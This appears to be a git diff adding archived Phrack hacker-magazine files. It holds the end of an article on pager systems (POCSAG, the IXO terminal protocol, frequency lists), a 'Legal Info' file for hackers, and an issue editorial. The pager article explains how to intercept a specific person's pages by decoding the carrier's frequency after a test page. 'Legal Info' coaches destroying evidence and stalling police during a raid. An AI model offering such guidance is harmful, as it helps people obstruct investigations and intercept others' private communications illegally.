+POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps.
+Most commercial paging companies today use at least 1200, although many
+companies who own their own paging terminals for in-house use transmit
+at 512.  Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send
+the majority of their traffic at 2400 to make the maximum use of
+their bandwidth.  In other words, the faster they can deliver pages,
+the smaller their queue of outgoing pages is.  Although these
+carriers have upgraded their equipment in the field to broadcast at
+2400 (or plan to do so in the near future), they still send out
+some pages at 1200 and 512 to accommodate their customers with older
+pagers.  Most 512 and 1200 traffic on the nationwide services is
+numeric or tone-only pages.
+
+POCSAG messages are broadcast in batches.  Each batch is comprised of 8
+frames, and each frame contains two codewords separated by a
+"synchronization" codeword.  A message can have as many codewords
+as needed to deliver the page and can stretch through several batches
+if needed.  The end of a complete message is indicated by a "next address"
+codeword.  Both addressing and user data are sent in the codewords, the
+distinction being the least significant bit of the codeword:
+0 for address data, and 1 for user-data.
+
+Standard alphanumeric data is sent in a seven-bit format, with each codeword
+containing 2 6/7 characters.  A newer 8-bit alphanumeric format is
+implemented by some carriers which allow users to send data such as
+computer files, graphics in addition to regular alphanumeric messages.
+The 8 bit format allows for 2.5 characters per codeword.
+
+Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per
+codeword.  Tone and voice pages contain address information only.
+
+(NOTE:  Pager data uses BCH 32,21 for encoding.  I don't imagine
+ very many of you will be trying to decode pager data by building your
+ own decoders, but for those of you who may, take my interpretation
+ of POCSAG framing with a grain of salt, and try to dig up the
+ actual POCSAG specs.)
+
+** THE PAGING RECEIVER **
+
+Paging receivers come in hundreds of shapes and sizes, although the vast
+majority are manufactured by Motorola.  Numeric pagers comprise over
+fifty percent all pagers in use.   Alphanumeric comprises about thirty
+percent, with tone and voice pagers making up the remainder.
+
+Pagers are uniquely addressed by a capcode.  The capcode is usually six
+to eight digits in length, and will be printed somewhere on the pager
+itself.  Many pager companies assign customers PIN numbers, which are
+then cross-referenced to a given capcode in databases maintained by
+the service provider.  PIN numbers have no other relationship
+to the capcode.
+
+Tone pagers are by far the most limited paging devices in use.
+When a specified number has been called, an address only message
+is broadcast, which causes the intended receiver to beep.  Wow.
+Tone pagers usually have 4 capcodes, which can correspond to
+different locations to call back.  Voice pagers are similar, except
+they allow the calling party to leave a 15 to 30 second message.
+The voice message is broadcast immediately after the capcode of the
+receiver, which unsquelches the device's audio.
+
+Numeric pagers, although seemingly limited by their lack of display
+options have proven otherwise by enterprising users.  Most numeric
+data sent is obviously related to phone numbers, but numerous users
+have developed codes relating to various actions to be carried out
+by the party being paged.  The most prolific users of this have
+been the Chinese who have one of the most active paging networks
+in the world.  I suppose the next biggest users of code-style numeric
+paging would be drug dealers.  (2112 0830 187 -- get to the fucking
+drop site by 8:30 or I'll bust a cap in your ass!)  :)
+
+Alphanumeric pagers are most often contacted through a dedicated
+service that will manually enter in the message to be sent onto the
+paging terminal.  One such service, NDC, offers its phone-answering
+and message typing services to various pager companies.  Next time
+you are talking to a pager operator, ask him or her if they are at
+NDC.  They probably are.
+
+In addition to the capcode, pagers will have an FCC ID number, a serial
+number, and most importantly, the frequency that the device has been
+crystaled for imprinted on the back of the device.  Although technology
+exists that would allow pagers to listen on a number of frequencies
+by synthesizing the frequency rather than using a crystal, pager
+manufacturers stick to using crystals to "keep the unit cost down."
+
+Pagers may have multiple capcodes by which they can be addressed by.
+Multiple capcodes are most often used when a person has subscribed to
+various services offered by their provider, or when the subscriber is
+part of a group of individuals who will all need to receive the same
+page simultaneously (police, EMTs, etc.).
+
+Most low-cost pagers have their capcode stored on the circuit board
+in a PAL.  Most paging companies will completely exchange pagers
+rather than remove and reprogram the PAL, so I don't think
+it's worth it for any experimenter to attempt.  However, like most
+Motorola devices, many of their paging products can be reprogrammed
+with a special serial cable and software.  Reprogramming software
+is usually limited to changing baud rates, and adding capcodes.
+
+Additionally, some units can be reprogrammed over the air by the
+service provider.  Using a POCSAG feature known as OTP (over the air
+programming) the service provider can instruct the paging receiver to
+add capcodes, remove capcodes, or even shut itself down in the case
+of non-payment.
+
+** SERVICES **
+
+With the growing popularity of alphanumeric pagers, many service providers
+have decided to branch out into the information business.  The most
+common of these services is delivery of news headlines.  Other services
+include stock quotes, airline flight information, voice mail and
+fax reception notification, and email.  Of course, all of these services
+are available for a small additional monthly premium.
+
+Email is probably the single coolest thing to have sent to your
+alpha pager.  (Unless you subscribe to about a zillion mailing lists)
+Companies like SkyTel and Radiomail give the user an email address
+that automatically forwards to your paging device.
+IE: PIN-NUMBER@skymail.com.  Several packages exist for forwarding
+email from a UNIX system by sending stripping down the email to
+pertinent info such as FROM and SUBJECT lines, and executing a script
+to send the incoming mail out via a pager terminal data port.
+One such program is IXOBEEPER, which can be found with an archie
+query.
+
+Radiomail's founder, (and rather famous ex-hacker in his own right - go
+look at ancient ComputerWorld headlines), Geoff Goodfellow had devised
+such a method back in the late 70's.  His program watched for incoming
+email, parsed the mail headers, and redirected the FROM and SUBJECT
+lines to his alphanumeric pager.  Obviously, not many people had
+alphanumeric pagers at all, much less email addresses on ARPANET
+back in the 70's, so Geoff's email pager idea didn't see much
+wide-spread use until much later.
+
+Two RFC's have been issued recently regarding paging and the Internet.
+RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP.
+Upon connecting to the SNPP port the user issues commands such as:
+
+        PAGE followed by pager telephone number
+        MESS followed by the alpha or numeric message
+        SEND
+      & QUIT
+
+RFC 1568 has met with some opposition in the IETF, who don't consider
+it worthwhile to implement a new protocol to handle paging, since it
+can be handled easily using other methods.
+
+The other RFC, number 1569, suggests that paging be addressed in a rather
+unique manner.  Using the domain TPC.INT, which would be reserved for
+services that necessitate the direct connection to The Phone Company,
+individual pagers would be addressed by their individual phone numbers.
+Usernames would be limited to pager-alpha or pager-numeric to represent
+the type of pager being addressed.  For example, an alpha-page being sent to
+1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int.
+
+** PAGING TERMINAL DATA PORTS **
+
+Many services offer modem connections to pager terminals so that
+computer users can send pages from their desks using software packages
+like WinBeep, Notify! or Messenger.  All of these services connect to
+the pager terminal and speak to it using a protocol known as
+IXO.
+
+Upon connection, a pager terminal identifies itself with the following:
+
+ID=
+
+(I bet you always wondered what the hell those systems were)
+Paging terminals default to 300 E71, although many larger companies
+now have dialups supporting up to 2400.
+
+Many such systems allow you to manually enter in the appropriate information
+by typing a capital "M" and a return at the ID= prompt.  The system will then
+prompt you for the PIN of the party you wish to page, followed by a prompt
+for the message you wish to send, followed by a final prompt asking if you
+wish to send more pages.  Not every pager terminal will support a manual
+entry, but most do.
+
+All terminals support the IXO protocol.  As there are far too many
+site specific examples within the breadth of IXO, we will concentrate on
+the most common type of pager services for our examples.
+
+[  Sample IXO transaction of a program sending the message ABC to PIN 123
+   gleened from the IXOBeeper Docs                                         ]
+
+Pager Terminal                          YOU
+--------------------------------------------------------------
+                                        <CR>
+ID=
+                                        <ESC>PG1<CR>
+Processing - Please Wait
+                                        <CR>
+<CR>
+ACK <CR>
+<ESC>[p <CR>
+                                        <STX>123<CR>
+                                        ABC<CR>
+                                        <ETX>17;<CR>
+<CR>
+ACK <CR>
+                                        <EOT><CR>
+<ESC>EOT <CR>
+
+
+The checksum data came from:
+
+STX     000 0010
+1       011 0001
+2       011 0010
+3       001 0011
+<CR>    000 1101
+A       100 0001
+B       100 0010
+C       100 0011
+<CR>    000 1101
+ETX     000 0011
+----------------
+     1 0111 1011
+----------------
+     1    7    ;  Get it?  Get an ASCII chart and it will all make sense.
+
+
+Note:  Everything in the paging blocks, from STX to ETX inclusive are used
+       to generate the checksum.  Also, this is binary data, guys...you can't
+       just type at the ID= prompt and expect to have it recognized as IXO.
+       It wants specific BITS.  Got it?  Just checking...
+
+
+** PAGER FREQUENCIES - US **
+
+[Frequencies transmitting pager information are extremely easy to
+ identify while scanning.   They identify each batch transmission
+ with a two-tone signal, followed by bursts of data.  People with
+ scanners may tune into some of the following frequencies to
+ familiarize themselves with this distinct audio.]
+
+Voice Pager Ranges:      152.01   - 152.21
+                         453.025  - 453.125
+                         454.025  - 454.65
+                         462.75   - 462.925
+
+Other Paging Ranges:      35.02   -  35.68
+                          43.20   -  43.68
+                         152.51   - 152.84
+                         157.77   - 158.07
+                         158.49   - 158.64
+                         459.025  - 459.625
+                         929.0125 - 931.9875
+
+** PAGER FREQUENCIES - WORLD **
+
+Austria         162.050  - 162.075         T,N,A
+Australia       148.100  - 166.540         T,N,A
+                411.500  - 511.500         T,N,A
+Canada          929.025  - 931-975         T,N,A
+                138.025  - 173.975         T,N,A
+                406.025  - 511.975         T,N,A
+China           152.000  - 172.575           N,A
+Denmark                    469.750           N,A
+Finland                    450.225         T,N,A
+                146.275  - 146.325         T,N,A
+France          466.025  - 466.075         T,N,A
+Germany         465.970  - 466.075         T,N,A
+                           173.200         T,N,A
+Hong Kong                  172.525           N,A
+                           280.0875        T,N,A
+Indonesia       151.175  - 153.050             A
+Ireland         153.000  - 153.825         T,N,A
+Italy                      466.075         T,N,A
+                           161.175         T,N
+Japan           278.1625 - 283.8875         T,N
+Korea           146.320  - 173.320         T,N,A
+Malaysia        152.175  - 172.525           N,A,V
+                           931.9375          N,A
+Netherlands     156.9865 - 164.350         T,N,A
+New Zealand     157.925  - 158.050         T,N,A
+Norway          148.050  - 169.850         T,N,A
+Singapore                  161.450           N,A
+                           931.9375          N,A
+Sweden                     169.8           T,N,A
+Switzerland                149.5           T,N,A
+Taiwan                     166.775           N,A
+                           280.9375          N,A
+Thailand                   450.525           N,A
+                172.525  - 173.475           N,A
+UK              138.150  - 153.275         T,N,A
+                454.675  - 466.075         T,N,A
+
+T = Tone
+N = Numeric
+A = Alphanumeric
+V = Voice
+
+
+** INTERCEPTION AND THE LAW **
+
+For many years the interception of pages was not considered an
+invasion of privacy because of the limited information provided
+by the tone-only pagers in use at the time.  In fact, when
+Congress passed the Electronic Communications Privacy Act in 1986
+tone-only pagers were exempt from its provisions.
+
+According to the ECPA, monitoring of all other types of paging signals,
+including voice, is illegal.  But, due to this same law, paging
+transmissions are considered to have a reasonable expectation to
+privacy, and Law Enforcement officials must obtain a proper court
+order to intercept them, or have the consent of the subscriber.
+
+To intercept pages, many LE-types will obtain beepers programmed with
+the same capcode as their suspect.  To do this, they must contact
+the paging company and obtain the capcode associated with the person
+or phone number they are interested in.  However, even enlisting
+the assistance of the paging companies often requires following
+proper legal procedures (warrants, subpoenas, etc.).
+
+More sophisticated pager-interception devices are sold by a variety
+of companies.  SWS Security sells a device called the "Beeper Buster"
+for about $4000.00.  This particular device is scheduled as
+a Title III device, so any possession of it by someone outside
+a law enforcement agency is a federal crime.  Greyson Electronics
+sells a package called PageTracker that uses an ICOM R7100
+in conjunction with a personal computer to track and decode pager
+messages.  (Greyson also sells a similar package to decode
+AMPS cellular messages from forward and reverse channels called
+"CellScope.")
+
+For the average hacker-type, the most realistic and affordable option
+is the Universal M-400 decoder.  This box is about 400 bucks and
+will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
+seen a paging service using GOLAY.)  It also decodes CTCSS, DCS, DTMF,
+Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX.  It
+takes audio input from any scanners external speaker jack, and
+is probably the best decoder available to the Hacker/HAM for the price.
+
+Output from the M400 shows the capcode followed by T, N or A (tone, numeric
+or alpha) ending with the message sent.  Universal suggests hooking
+the input to the decoder directly to the scanner before any de-emphasis
+circuitry, to obtain the true signal.  (Many scanners alter the audio
+before output for several reasons that aren't really relevant to this
+article...they just do. :) )
+
+Obviously, even by viewing the pager data as it streams by is of little
+use to anyone without knowing to whom the pager belongs to.  Law Enforcement
+can get a subpoena and obtain the information easily, but anyone else
+is stuck trying to social engineer the paging company.  One other alternative
+works quite well when you already know the individuals pager number,
+and need to obtain the capcode (for whatever reason).
+
+Pager companies will buy large blocks in an exchange for their customers.
+It is extremely easy to discover the paging company from the phone number
+that corresponds to the target pager either through the RBOC or by paging
+someone and asking them who their provider is when they return your call.
+Once the company is known, the frequencies allocated to that company
+are registered with the FCC and are public information.  Many CD-ROMs
+are available with the entire FCC Master Frequency Database.
+(Percon sells one for 99 bucks that covers the whole country -
+716-386-6015)  Libraries and the FCC itself will also have this information
+available.
+
+With the frequency set and a decoder running, send a page that will be
+incredibly easy to discern from the tidal wave of pages spewing
+forth on the frequency.  (6666666666, THIS IS YOUR TEST PAGE, etc...)
+It will eventually scroll by, and presto!  How many important people
+love to give you their pager number?
+
+** THE FUTURE **
+
+With the advent of new technologies pagers will become even more
+present in both our businesses and private lives.  Notebook computers
+and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
+Some of these cards have actual screens that allow for use without the
+computer, but most require a program to pull message data out.  These
+cards also have somewhat large storage capacity, so the length of
+messages have the option of being fairly large, should the service
+provider allow them to be.
+
+With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
+can expect to receive usable computer data such as spreadsheet
+entries, word processing documents, and of course, GIFs.  (Hey, porno
+entrepreneurs:  beeper-porn!  Every day, you get a new gif sent to your
+pagecard!  Woo Woo.  Sad thing is, it would probably sell.)
+
+A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
+Roaming Computer) was one of the first to allow for such broadcasts.
+EMBARC makes use of a proprietary Motorola protocol, rather than
+POCSAG, so subscribers must make use of either a Motorola NewsStream
+pager (with nifty serial cable) or a newer PCMCIA pager.  Messages are
+sent to (and received by) the user through the use of special client
+software.
+
+The software dials into the EMBARC message switch accessed through
+AT&T's ACCUNET packet-switched network.  The device itself is used
+for authentication (most likely its capcode or serial number)
+and some oddball protocol is spoken to communicate with the switch.
+
+Once connected, users have the option of sending a page out, or
+retrieving pages either too large for the memory of the pager, or
+from a list of all messages sent in the last 24 hours, in case the
+subscriber had his pager turned off.
+
+Additionally, the devices can be addressed directly via x.400
+addresses.  (X.400: The CCITT standard that covers email address
+far too long to be worth sending anyone mail to.)  So essentially,
+any EMBARC customer can be contacted from the Internet.
+
+MTEL, the parent company of the huge paging service SkyTel, is
+implementing what may be the next generation of paging technologies.
+This service, NWN, being administrated by MTEL subsidiary Destineer,
+is most often called 2-way paging, but is more accurately Narrowband-PCS.
+
+The network allows for the "pager" to be a transceiver.  When a page
+arrives, the device receiving the page will automatically send back
+an acknowledgment of its completed reception.  Devices may also
+send back some kind of "canned response" the user programs.  An example
+might be:  "Thanks, I got it!" or "Why on Earth are you eating up my
+allocated pages for the month with this crap?"
+
+MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
+access to the narrowband PCS spectrum before the auctions.  This is a big
+deal, and did not go unnoticed by Microsoft.  They dumped cash into the
+network, and said the devices will be supported by Chicago.  (Yeah,
+along with every other device on the planet, right?  Plug and Pray!)
+
+The network will be layed out almost identically to MTEL's existing paging
+network, using dedicated lines to connect towers in an area to a central
+satellite up/downlink.  One key difference will be the addition of
+highly somewhat sensitive receivers on the network, to pick up the ACKs
+and replies of the customer units, which will probably broadcast at
+about 2 or 3 watts.  The most exciting difference will be the
+speed at which the network transmits data:  24,000 Kbps.  Twenty-four
+thousand.  (I couldn't believe it either.  Not only can you get your
+GIFs sent to your pager, but you get them blinding FAST!)  The actual
+units themselves will most likely look like existing alphanumeric pagers
+with possibly a few more buttons, and of course, PCMCIA units will
+be available to integrate with computer applications.
+
+Beyond these advancements, other types of services plan on offering
+paging like features.  CDPD, TDMA & CDMA Digital Cellular and ESMR
+all plan on providing a "pager-like" option for their customers.
+The mere fact that you can walk into a K-Mart and buy a pager
+off a rack would indicate to me that pagers are far to ingrained into
+our society, and represent a wireless technology that doesn't scare
+or confuse the yokels.  Such a technology doesn't ever really go away.
+
+
+** BIBLIOGRAPHY **
+
+Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
+         p. 8, July, 1994.
+
+O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.
+
+O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.
diff --git a/phrack46/9.txt b/phrack46/9.txt
new file mode 100644
index 0000000..71131f1
--- /dev/null
+++ b/phrack46/9.txt
@@ -0,0 +1,251 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 9 of 28
+
+****************************************************************************
+
+                           Legal Info
+                        by Szechuan Death
+
+     OK.  This document applies only to United States citizens: if
+you are a citizen of some other fascist country, don't come whining
+to me when this doesn't work..... :)
+
+     Make no mistake:  I'm not a lawyer.  I've merely paid
+attention and picked up some facts that might be useful to me along
+the way.  There are three subjects that it pays to have a knowledge
+of handy:  prescription drugs, medical procedures, and legal facts.
+While these may all be boring as hell, they can certainly pull your
+ass out of the fire in a pinch.
+
+     Standard disclaimer:  I make no claims about this document or
+facts contained therein.  I also make no claims about their legal
+authenticity:  if you want to be 100% sure, there's a library in
+damn near every town, LOOK IT UP!
+
+     One more thing:  This document is useful for virtually
+ANYTHING.  It's effectiveness stretches far beyond computer hacking
+(although it's worn a bit thin for serious crimes, as every cretin
+on Death Row has tried it already.....:)
+
+     OK.  Let's say, just for the sake of argument, that you've
+decided to take a walk along the wild side and do something
+illegal.  For our purposes, let's say computer hacking (imagine
+that).  There are many things you can do cover your legal ass,
+should your activities come to the attention of any of our various
+friendly law-enforcement agencies nationwide.
+
+
+--  Part 1:  Police Mentality
+
+     You must understand the police, if you ever want to be able to
+thwart them and keep your freedom.  Most police, to survive in
+their jobs, have developed an "Us vs. Them" attitude, which we
+should tolerate (up to a point).  They use this attitude to justify
+their fascist tactics.  "Us" is the police, a brotherhood that
+keeps the peace, always does right, and never snitches on each
+other, no matter what the cause.  "Them" is the rest of the
+population.  If "They" are not guilty of a specific crime, they
+must have done something else, and they're doing their damndest to
+avoid getting caught.  In addition, many police have cultivated an
+attitude similar to that of a 15-year-old high school punk:  "I'm
+bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
+Unfortunately, these people have weapons and the authority to
+support that attitude.  Therefore, if the police come to your
+house, be EXTREMELY polite and subservient; now is not the time to
+start spouting your opinion about the police state in America
+today.  Also, DO NOT RESIST THEM IF THEY ARREST YOU.  Besides
+adding a charge of "Resisting Arrest" and/or "Assaulting an
+Officer", it can get very dangerous.  The police have been trained
+in a number of suspect-control techniques, most of which involve
+twisting body parts at unnatural angles.  As if this weren't
+enough, almost all police carry guns.  Start fighting and you'll
+get a couple broken bones, torn ligaments, or worse, a few bullet
+wounds (possibly fatal).  So remember, be very meek.  Show them
+that you are cowed by their force and their blustering presence,
+and this will save you a black eye or two on the way down to the
+station (from tripping and falling, of course).
+
+--  Part 2:  Hacker's Security
+
+     CARDINAL RULE #1:  Get rid of the evidence.  No evidence = no
+case for the prosecutor.  The Novice Hacker's Guide from LOD has an
+excellent way to put this:
+
+VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
+      It doesn't hurt to store everything encrypted on your hard disk, or
+      keep your notes buried in the backyard or in the trunk of your car.  You
+      may feel a little funny, but you'll feel a lot funnier when you when you
+      meet Bruno, your transvestite cellmate who axed his family to death.
+
+Basic hints:
+Hide all your essential printouts, or burn them if they're trash
+(remember:  police need no warrant to search your trash).  Encrypt
+the files on your hard drive with something nasty, like PGP or RSA.
+Use a file-wiper, NOT delete, to get rid of them when you're done.
+And WIPE, don't FORMAT, your floppies and other magnetic media
+(better still, degauss them).  With a little common sense and a bit
+of effort, a great deal of legal headaches can be avoided.
+
+
+--  Part 3A:  Polite Entry
+
+     Next part.  You and your friends are enjoying an evening of
+trying to polevault the firewall on whitehouse.com, when suddenly
+you hear a knock at the door.  Opening the door, you find a member
+of the local police force standing outside, asking if he can come
+in and ask you some questions.  Now, here's where you start to piss
+your pants.  If you were smart, you'll have arranged something
+beforehand where your friends (or, if there ARE no friends present,
+an automatic script) are getting rid of the evidence as shown in
+part 2.  If you have no handy means of destroying the data
+(printouts, floppies, tapes, etc.), throw the whole mess into
+the bathtub, soak it in lighter fluid, and torch it.  It's a
+helluva mess to clean up, but nothing compared to latrine duty at
+your nearest federal prison.
+
+     While the evidence is being destroyed, you're stalling the
+police.  Ask to see their search warrant and IDs.  Mull over each
+and every one of them for at least 5 minutes.  If they have none,
+start screaming about your 4th Amendment rights.  Most importantly:
+DON'T INVITE THEM IN.  They're like vampires:  if you let them in,
+you're fucked.  If they see anything even REMOTELY incriminating,
+that constitutes probable cause for a search and they'll be
+swarming all over your house like flies on shit.  (And guess what!
+It's legal, because YOU LET THEM IN!)  Now, be aware that this
+won't stall them forever:  they can simply wait outside the house
+and radio in a request for a search warrant, which will probably be
+signed by the judge on duty at that time.  Remember:  "If you're
+not willing to be searched, you MUST have something to hide!"  If
+there are no friends assisting you, as shown above, USE THIS TIME
+EFFECTIVELY.  When they get the warrant signed, that will be too
+late, because you'll have erased/shredded/burned/hidden/etc. all
+the incriminating evidence.
+
+
+--  Part 3B:  And Suddenly, The Door Burst In
+
+     Now, if the police already have a search warrant, they don't
+need to knock on the door.  They can simply kick the door down and
+waltz in.  If you're there at the time, you CAN try and stall them
+as shown above, by asking to see their search warrant and IDs.
+This may not work now, because they have you cold, hard, and dead
+to rights.  And, if anything incriminating is in a place where they
+can find it, you're fucked, because it WILL be used as evidence.
+But this won't happen to you, because you've already put everything
+you're not using right at the moment in a safe, HIDDEN, place.
+Right?
+
+     This leaves the computer.  If you hear them kicking the door
+in, keep calm, and run a script you've set up beforehand to low-
+level-format the drive, wipe all hacking files, encrypt the whole
+thing, etc.  If there's any printouts or media hanging out, try and
+hide them (probably worthless anyway, but worth a try).  The name
+of the game now is to minimize the damage that can be done to you.
+The less hard evidence linking you to the "crime", the less of a
+case the prosecutor will have and the better off you'll be.
+
+
+--  Part 4:  The Arrest
+
+     Now is the time to kick all your senses into hyper-record
+mode.  For you to get processed through the system without a hitch,
+the arrest has to go perfectly, by the numbers.  One small slip and
+you're out through a loophole.  Now, the police are aware of this
+and will be doing their best to see that doesn't happen, but you
+may get lucky all the same.  First of all:  According to the
+Miranda Act, the police are REQUIRED BY LAW to read you your rights
+and make sure you understand them.  Remember EVERY WORD THEY SAY TO
+YOU.  If they don't say it correctly, you may be able to get off on
+a technicality.
+
+     CARDINAL RULE #2:  You have the right to remain silent.
+EXERCISE IT.  This cannot be stressed enough.  If you need a
+reminder, listen to the first part of the Miranda Warning:
+
+     "You have the right to remain silent.  If you give up that
+right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT
+OF LAW."
+
+     Nice ring to it, hmm?  The only words coming out of your mouth
+at this point should be "I'd like to speak to my attorney, please"
+and, if applicable in your area, "I'd like to make a phone call,
+please"  (remember the "please's," see part #1 above)  Nothing
+else.  There are tape recorders, video cameras, PLUS the word of a
+dozen police officers to back it all up.  How's that for an array
+of damning evidence against you?
+
+     Then, after the ride downtown, you'll be booked and probably
+asked a few questions.  Say nothing.  You're probably pissing your
+pants with fear at this point, and may be tempted to roll over on
+everyone you ever shook hands with in your whole life, but keep
+your calm, and KEEP QUIET.  Keep asking for your attorney and/or a
+phone call, no matter WHAT threats/deals/etc. they make to you.
+Remember, they can't legally interrogate you without your attorney
+present.  You may also be tempted to show your mettle at this
+point, and give them false information, but remember one thing:  If
+you lie to them, you can be convicted of perjury (a nasty offense
+itself).  The best policy here is NSA:  Never Say Anything.
+Remember, you never have to keep track of what you've said, or have
+to worry about having it used against you, if you've said NOTHING.
+
+
+--  Part 5:  The Trial
+
+     Here, we'll assume you've been arrested, booked, let out on
+bail, indicted on X counts of so-and-so, etc.  You're now in the
+system.  CARDINAL RULE #3:  Get the best criminal defense attorney
+you can afford, preferably one with some background in the crime
+you've committed.  No, scratch that:  make that the best criminal
+defense attorney, PERIOD.  It's a helluva lot better to spend 5
+years working at McDonald's 12 hours a day to pay back your legal
+fee, than it is to spend 5 years in the slammer getting pimped out
+nightly for a pack of menthols.  Also, pay attention during the
+trial.  Remember, the defense attorney is working for YOU:  it's
+YOUR life they're deciding, so give him every bit of information
+and help you can.  You're paying him to sort it out for you, but
+you should still keep an eye on things:  if, in the middle of a
+trial, something happens (you get a killer idea, or want to jump up
+and scream "BULLSHIT!"), TELL HIM!  It very well might be useful!
+Also, have him nitpick every single thing for loopholes,
+technicalities, civil rights violations, etc.  It's worth it if it
+pays off.
+
+     Another important thing is to look good.  Image is everything.
+Although you might prefer to wear heavily stained rock-band T-
+shirts, leather jackets, ratty jeans, etc. in real life, that will
+be EXTREMELY damning in the eyes of the judge/jury.  They say that
+clothes make the man, and in this case it's REALLY true:  get a
+suit, comb/cut your hair, shave, etc.  Make yourself look like a
+"positively respectable darling" in the eyes of the court!  It'll
+pay off for you. (hey, it worked for Eric and Lyle Menendez)
+
+
+--  Part 8:  The Prison
+
+     If you're here, you're totally fucked.  Unless, by divine
+intervention, your conviction is overturned on appeal, you'd better
+clear up the next 5 years on your calendar.  Apparently, you didn't
+read closely enough, so read this every day during your long stay
+in prison, and you'll be better equipped next time (assuming there
+IS a next time..... :)
+
+
+     Remember the cardinal rules:  1)  Don't leave evidence around
+to be found.  2)  KEEP CALM AND KEEP QUIET.  3)  Get the best
+attorney available.  If you remember these, and exercise some common
+sense and a lot of caution, you should have no problem handling any
+legal problems that come up.
+
+     Note:  This is intended to be used as a handbook for defense
+from minor crimes ONLY (hacking, DWI, etc.)  If you're a career
+criminal, or you've murdered or raped somebody, you're scum, and at
+least have the grace to plead "guilty".  Don't waste the tax-
+payers' time and money with fancy legal footwork.
+
+     Please feel free to add anything or correct this document.
+However, if you DO add or correct something, PLEASE make sure it's
+true, and PLEASE email me the changes so I can include them in the next
+revision of the document.  My address is pstlb@acad3.alaska.edu.  Happy
+hacking to all, and if this helps you avoid getting caught, so much the
+better.  :)
diff --git a/phrack47/1.txt b/phrack47/1.txt
new file mode 100644
index 0000000..75416da
--- /dev/null
+++ b/phrack47/1.txt
@@ -0,0 +1,342 @@
+                              ==Phrack Magazine==
+
+                   Volume Six, Issue Forty-Seven, File 1 of 22
+
+                                 Issue 47 Index
+                              ___________________
+
+                               P H R A C K   4 7
+
+                                 April 15, 1995
+                              ___________________
+
+                                 "Mind The Gap"
+
+This issue is late, so is my tax return, but I have a lot of excuses for
+both.
+
+Lots of things have happened since last issue.  I've been hassled by the
+police for publishing Phrack.  I've been to the Pyramids at Giza and
+the tombs in the Valley of the Kings.  I've been to London several times
+and met spies from MI5 and GCHQ.  I watched almost everyone I know get busted.
+I went to check out NORAD and then skiied Breckenridge.  And I quit my job
+at Dell Computers after almost 3 years.
+
+Unemployment is great.  One of the best things about it is sleeping till noon.
+On the other hand, one of the worst things about it is that you sleep until
+noon.  It's been interesting anyway.  I've been doing a lot of reading:  price
+evaluation of the forensic chemistry section of the Sigma Chemicals catalog,
+the rantings of Hunter S. Thompson, the amazing cosmetic similarities between
+International Design Magazine and Wired, Victor Ostrovsky's Mossad books, every
+UNIX book ever written, every book on satellite communications ever written,
+and hundreds of magazines ranging from Film Threat to Sys Admin to Monitoring
+Times to Seventeen.  Lord knows what I'll do with this newfound wealth of
+information.
+
+Anyway, amongst all this, I've been trying to get things organized for
+Summercon this June 2,3,4 in Atlanta Georgia.  One of the other factors in
+the delay of Phrack was the hotel contract, so I could include full conference
+details in this issue.  By the way, you are all invited.
+
+Wait a minute, someone said something about busts?  Yes.  There were busts.
+Lots of them.  Raids upon raids upon raids.  Some local, some federal.  Some
+Justice, some Treasury.  You probably haven't read of any of these raids,
+nor will you, but they happened.  It has always been my policy not to
+report on any busts that have not gained media coverage elsewhere, so
+I'm not going to go into any details.  Just rest somewhat assured that
+if you haven't been raided by now, then you probably won't be.  (At least
+not due to these particular investigations.)
+
+People, if we all just followed one simple rule none of us would ever
+have any problems:  DO NOT HACK ANYTHING IN YOUR OWN COUNTRY.  If you are
+German, don't hack Germany!  If you are Danish, don't hack Denmark!  If you
+are Australian, don't hack Australia!  IF YOU ARE AMERICAN, DON'T HACK
+AMERICA!
+
+The last controversy surrounding this issue came at the last possible
+second.  In the several years that I've been publishing Phrack, we've
+revieved all kinds of files, but remarkably, I've never really recieved
+any "anarchy" files.  However, in the last several months I've been inundated
+with files about making bombs.  There were so many coming in, that I really
+couldn't ignore them.  Some of them were pretty damn good too.  So I figured,
+I'll put several of them together and put in ONE anarchy file as a kind of
+tongue-in-cheek look at the kind of stupidity we have floating around
+in the underground.
+
+Then the bomb went off in Oklahoma City.
+
+Then Unabomb struck again.
+
+Then the politicos of the world started spouting off about giving the
+federal law enforcement types carte blanche to surveil and detain people
+who do things that they don't like, especially with regards to terrorist
+like activites.
+
+Normally, I don't really give a damn about possible reprocussions of my
+writing, but given the political climate of the day, I decided that
+it would really be stupid for me to print these files.  I mean,
+one was REAL good, and obviously written by someone who learned "British"
+English in a non English-speaking country.  I mentioned my concerns to
+an individual who works with the FBI's counter-terrorism group, and was
+told that printing the file would probably be the stupidest thing I could
+possibly do in my entire life...PERIOD.
+
+So the file is nixed.  I really feel like I'm betraying myself and my
+readership, for giving into the underlying political climate of the day, and
+falling prey to a kind of prior-restraint, but I really don't need the grief.
+I'm on enough lists as it is, so I really don't need to be the focus of
+some multi-jurisdictional task-force on terrorism because I published
+a file on how to make a pipe bomb over the Internet.  (Hell, I'm now even
+on the Customs Department's list of ne'er-do-wells since someone from Europe
+thought it would be funny to send me some kind of bestiality magazine
+which was siezed.  Thanks a lot, asshole, whoever you are.)  Obviously, the
+media think the net is some kind of hotbed for bomb-making info, so I'm
+usually the first to satisfy their most warped yellow-journalistic
+fantasies, but not this time.
+
+I really hate what I see coming because of the mess in Oklahoma.  If
+the American government does what I suspect, we will be seeing
+a major conservative backlash, a resurgence of Hoover-esque power in the
+FBI, constitutional amendments to limit free speech, and a bad time
+for everyone, especially known-dissenters and suspicious folk like
+yours truly.  Be very afraid.  I am.
+
